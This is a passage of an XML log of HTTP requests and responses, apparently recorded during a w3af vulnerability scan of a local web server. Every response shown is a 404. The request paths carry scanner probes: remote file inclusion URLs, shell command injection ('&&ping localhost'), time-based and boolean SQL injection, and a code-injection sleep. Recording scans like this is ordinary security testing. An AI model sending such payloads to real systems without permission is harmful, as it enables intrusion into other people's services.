                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="548">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="548">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="549">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="549">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="550">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="550">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="551">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="551">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="555">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="555">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="563">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="563">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="570">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="570">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="624">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="624">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="667">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="667">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="721">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="721">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="761">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79%22+OR+%2279%22%3D%2279 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="761">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="764">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="764">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="790">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79%22+AND+%2279%22%3D%2280 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="790">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="814">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79%27+OR+%2779%27%3D%2779 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="814">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="815">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/oRls4hxT HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="815">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="820">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="820">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="828">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79%27+AND+%2779%27%3D%2780 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="828">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="844">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/Ttkp9dW5 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="844">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="845">
                <httprequest>
                    <status>POST http://192.168.0.116:31337/79+OR+79%3D79+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse id="845">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
